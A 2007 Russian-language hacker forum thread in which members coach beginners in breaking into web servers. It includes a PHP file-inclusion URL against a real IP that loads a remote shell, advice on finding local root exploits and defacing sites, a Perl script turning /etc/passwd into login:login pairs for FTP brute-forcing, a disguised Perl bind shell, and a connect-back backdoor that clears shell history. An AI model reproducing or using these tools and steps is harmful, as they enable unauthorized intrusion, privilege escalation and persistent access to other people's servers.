Сканер Php Inc , Inj

Discussion in 'Уязвимости' started by Xszz, 24 Apr 2007.

  1. n1†R0x

    n1†R0x Elder - Старейшина

    Joined:
    20 Jan 2007
    Messages:
    728
    Likes Received:
    376
    Reputations:
    235
    ну закачаешь ты файл 2ndmenu без расширения, и что дальше? :)
    тем более, там в начале "c/".
    линк в студию
     
  2. Spyder

    Spyder Elder - Старейшина

    Joined:
    9 Oct 2006
    Messages:
    1,388
    Likes Received:
    1,209
    Reputations:
    475
    chmod 777 /home/site/index.php
    он всё равно выполнится как php код = )
    Другое дело что там с/ в начале
     
  3. Xszz

    Xszz Elder - Старейшина

    Joined:
    23 Apr 2007
    Messages:
    141
    Likes Received:
    42
    Reputations:
    9
    chmod 777 /home/site/index.php

    права не меняются я пользуюсь r57shell может есть какой ещё ?
     
  4. Xszz

    Xszz Elder - Старейшина

    Joined:
    23 Apr 2007
    Messages:
    141
    Likes Received:
    42
    Reputations:
    9
    http://212.41.0.34/index.php?fl=http://newxs.narod.ru/shell.txt&part=main

    Линк взят из раздела "PHP Иньекции"
     
  5. Spyder

    Spyder Elder - Старейшина

    Joined:
    9 Oct 2006
    Messages:
    1,388
    Likes Received:
    1,209
    Reputations:
    475
    выполняешь uname -a
    Смотришь чё тебе выдало, например Linux 2.6.14
    идёшь на милворм или в гугл
    пишешь Linux 2.6.14 local root exploit
    если есть плоенты для этой версии, качаешь его на сервер в папку /tmp и следуешь инструкциям написанным в плоенте =\
    Получаешь рута, теперь ты хэкер и король. Делаешь дефейс я пляшешь вокруг него с бубном =\
     
  6. Xszz

    Xszz Elder - Старейшина

    Joined:
    23 Apr 2007
    Messages:
    141
    Likes Received:
    42
    Reputations:
    9
    Понял !
    Тренируюсь дальше

    FreeBSD ns.sibstu.kts.ru 6.2-PRERELEASE FreeBSD 6.2-PRERELEASE #1: Tue Oct 31 18:11:44 KRAT 2006 [email protected].
     
  7. Xszz

    Xszz Elder - Старейшина

    Joined:
    23 Apr 2007
    Messages:
    141
    Likes Received:
    42
    Reputations:
    9
    Вот у меня возник ещё один вопрос , если я получаю содержимое файла etc/passwd что мне это даёт ?
     
  8. Spyder

    Spyder Elder - Старейшина

    Joined:
    9 Oct 2006
    Messages:
    1,388
    Likes Received:
    1,209
    Reputations:
    475
    FreeBSD 6.2
    чё то мне подсказывает что превад плоентов нету =\
     
  9. Xszz

    Xszz Elder - Старейшина

    Joined:
    23 Apr 2007
    Messages:
    141
    Likes Received:
    42
    Reputations:
    9
    del

    Вот смотрите , кто - то залил шелл свой на сервер , а у меня не получаетсья , как он зделал , если кто знает , расскажите .
    И его шелл может все редактировать , создавать , удалять , короче гворя , полный доступ.
    Спасибо
     
    #29 Xszz, 26 Apr 2007
    Last edited by a moderator: 26 Apr 2007
  10. zl0ba

    zl0ba ПсихолоГ

    Joined:
    10 Oct 2006
    Messages:
    393
    Likes Received:
    301
    Reputations:
    52
    Можно пропарсить и побрутить FTP на login:login вдруг повезёт.

    Вот парсер:
    Code:
    #!/usr/bin/perl 
    $in=$ARGV[0]; 
    $out=$ARGV[1]; ## определим параметры скрипта 
    exit print "Use $0 $in $out\n" unless ($out); 
    open(IN, "$in"); 
    open(OUT, ">out"); 
    while(<IN>){ 
    chomp; 
    if (~/sh$/){ ## запишем только валидные аккаунты 
    ($u,@udef)=split ":"; 
    print OUT "$u:$u\n"; ## В виде пары login:login 
    } 
    } 
    close(IN); 
    close(OUT);
     
  11. XENON4IK

    XENON4IK Elder - Старейшина

    Joined:
    22 Apr 2007
    Messages:
    135
    Likes Received:
    62
    Reputations:
    15
    У меня вот тут возник вопрос...
    Есть у меня шелл... залил под фрюху туда эксплойт... А как его запутить то? Сорри за ламерский вопрос=))
     
  12. zl0ba

    zl0ba ПсихолоГ

    Joined:
    10 Oct 2006
    Messages:
    393
    Likes Received:
    301
    Reputations:
    52
    Надо пробиндить машину, законектиться с помощью
    netcat и скомпилить сплойт.

    bind.pl:

    Code:
    #!/usr/bin/perl
    
    $port = 32767; 
    $port = $ARGV[0] if $ARGV[0];
    exit if fork;
    $0 = "updatedb" . " " x100;
    $SIG{CHLD} = 'IGNORE';
    use Socket;
    socket(S, PF_INET, SOCK_STREAM, 0);
    setsockopt(S, SOL_SOCKET, SO_REUSEADDR, 1);
    bind(S, sockaddr_in($port, INADDR_ANY));
    listen(S, 50);
    while(1)
    {
    	accept(X, S);
    	unless(fork)
    	{
    		open STDIN, "<&X";
    		open STDOUT, ">&X";
    		open STDERR, ">&X";
    		close X;
    		exec("/bin/sh");
    	}
    	close X;
    }
    С помощью шелла выполняем команду : perl bind.pl в дире /tmp

    конектимся через netcat : 111.111.111.111 3432
     
  13. XENON4IK

    XENON4IK Elder - Старейшина

    Joined:
    22 Apr 2007
    Messages:
    135
    Likes Received:
    62
    Reputations:
    15
    Спасибо ща буду пробывать.
     
  14. XENON4IK

    XENON4IK Elder - Старейшина

    Joined:
    22 Apr 2007
    Messages:
    135
    Likes Received:
    62
    Reputations:
    15
    Хммм почему то не биндиться машина... или забиндилась. Можно какнить проверить? а то он уже пол часа грузится...
    Во ещё там нашёл такой файлик=)
    bd.pl
    Code:
    #!/usr/bin/perl
    use IO::Socket;
    #cONNECT BACKDOOR EDITED BY XORON          
    #lord@SlackwareLinux:/home/programing$ perl dc.pl
    #--== WElcome Obormot ==--
    #
    #Usage: dc.pl [Host] [Port]
    #
    #Ex: dc.pl 127.0.0.1 2121
    #lord@SlackwareLinux:/home/programing$ perl dc.pl 127.0.0.1 2121
    #--== ConnectBack Backdoor Shell is redy ==--
    #
    #[*] Resolving HostName
    #[*] Connecting... 127.0.0.1
    #[*] Spawning Shell
    #[*] Connected to remote host
    
    #bash-2.05b# nc -vv -l -p 2121
    #listening on [any] 2121 ...
    #connect to [127.0.0.1] from localhost [127.0.0.1] 32769
    #--== ConnectBack Backdoor Shell EDITED BY XORON TURKЭSH HACKER ==--
    #
    #--==Systeminfo==--
    #Linux SlackwareLinux 2.6.7 #1 SMP Thu Dec 23 00:05:39 IRT 2004 i686 unknown unknown GNU/Linux
    #
    #--==Userinfo==--
    #uid=1001(xoron) gid=100(users) groups=100(users)
    #
    #--==Directory==--
    #/root
    #
    #--==Shell==--
    #
    $system    = '/bin/sh';
    $ARGC=@ARGV; 
    print "--== ConnectBack Backdoor Shell EDITED BY XORON TURKЭSH HACKER ==-- \n\n"; 
    if ($ARGC!=2) { 
      print "Usage: $0 [Host] [Port] \n\n"; 
      die "Ex: $0 127.0.0.1 2121 \n"; 
    } 
    use Socket; 
    use FileHandle; 
    socket(SOCKET, PF_INET, SOCK_STREAM, getprotobyname('tcp')) or die print "[-] Unable to Resolve Host\n"; 
    connect(SOCKET, sockaddr_in($ARGV[1], inet_aton($ARGV[0]))) or die print "[-] Unable to Connect Host\n"; 
    print "[*] Resolving HostName\n";
    print "[*] Connecting... $ARGV[0] \n"; 
    print "[*] Spawning Shell \n";
    print "[*] Connected to remote host \n";
    SOCKET->autoflush(); 
    open(STDIN, ">&SOCKET"); 
    open(STDOUT,">&SOCKET"); 
    open(STDERR,">&SOCKET"); 
    print "--== ConnectBack Backdoor Shell EDITED BY XORON TURKЭSH HACKER ==--  \n\n"; 
    system("unset HISTFILE; unset SAVEHIST;echo --==Systeminfo==--; uname -a;echo;
    echo --==Userinfo==--; id;echo;echo --==Directory==--; pwd;echo; echo --==Shell==-- "); 
    system($system);
    #EOF
    
     
    #34 XENON4IK, 26 Apr 2007
    Last edited: 26 Apr 2007
  15. Xszz

    Xszz Elder - Старейшина

    Joined:
    23 Apr 2007
    Messages:
    141
    Likes Received:
    42
    Reputations:
    9
    Немного непонял про Парсер , как им пользоваться .
    какие параметры задавать ?
    Спасибо.
     
  16. zl0ba

    zl0ba ПсихолоГ

    Joined:
    10 Oct 2006
    Messages:
    393
    Likes Received:
    301
    Reputations:
    52
    2XENON4IK
    Можно проверить командой ps в веб шелле, если конечно она доступна.
    Мне кажеться сдесь был хекер, файл bd.pl это бекдор.
    2Xszz
    perl parser.pl ftppass.txt out

    ftppass.txt - есть тот файл с etc/passwd
    out - отпарсированый файл с login:login
    --
    также есть траблы с актив перлом под винду , почему то иногда не пашет. Без проблем можно отпарсировать в любой *nix или в Cygwin.
     
    #36 zl0ba, 27 Apr 2007
    Last edited: 27 Apr 2007
  17. n1†R0x

    n1†R0x Elder - Старейшина

    Joined:
    20 Jan 2007
    Messages:
    728
    Likes Received:
    376
    Reputations:
    235
    Тема превратилась в "задай вопрос - получи ответ"...
     
  18. XENON4IK

    XENON4IK Elder - Старейшина

    Joined:
    22 Apr 2007
    Messages:
    135
    Likes Received:
    62
    Reputations:
    15
    Не я понял что там был кул хацкер из турции=))) Проблему решил. подконнектился через неткэт. Пытался откомпилить сплоит.. но чёто не так или просто сплойт не пашет..
    компилил так:
    Code:
    gcc -o3 -static -(чёто)-(чёто)-pointer kernel.c -o kernel
    
    Причём между -(чёто)-(чёто)-pointer нету пробелов...
    Это видел в каком то видео... сорри что не помню что там было точно написано. Но не суть. Вроде он компилится и создаёт этот файл kernel.
    Я его запускаю он мне типо пишет создал папку /tmp/sh а реально он её не создаёт...
    Это в чём проблема в компиляции или просто ядро пропатчено?
    Ядро вроде уязвимое по версии...
    Домой прийду отпишусь поподробнее...
     
    1 person likes this.
  19. zl0ba

    zl0ba ПсихолоГ

    Joined:
    10 Oct 2006
    Messages:
    393
    Likes Received:
    301
    Reputations:
    52
    Если ядро патченое, сдесь кроме приват сплоинтов не чё не поможет =\, смотрим версии уязвимых демонов.